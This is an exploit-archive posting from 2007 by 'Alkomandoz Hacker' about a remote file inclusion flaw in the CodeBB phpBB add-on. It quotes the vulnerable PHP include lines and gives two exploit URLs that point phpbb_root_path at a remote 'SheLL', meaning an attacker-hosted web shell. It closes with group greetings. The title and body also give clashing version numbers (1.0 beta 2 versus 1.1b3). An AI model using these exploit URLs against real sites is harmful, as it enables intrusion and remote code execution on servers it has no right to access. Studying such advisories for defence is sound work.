CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion Vulnerability
# Published : 2007-03-28
# Author : Alkomandoz Hacker
# Previous Title : MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability
# Next Title : XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit

# codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

# D.Script: http://rd.cycnus.de/download/codebb-1.1b3.tar.bz2

# Discovered by: Alkomandoz Hacker

# Homepage: http://www.asb-may.net
# V.Code

# include_once($phpbb_root_path . 'includes/codebb/config.'.$phpEx);

require($phpbb_root_path . 'includes/codebb/scanners/scannerlist.'.$phpEx);



# Exploit:[Path]/codebb/pass_code.php?phpbb_root_path=SheLL

    [Path]/codebb/lang_select?phpbb_root_path=SheLL


# Greetz To: A-s-T Team & AsbMay's Group & KaBaRa & Mahmood_Ali & ThE-DE@TH & ToOoFa

# Thanx: asb-may.net & TrYaG.CoM

# www.Syue.com [2007-03-28]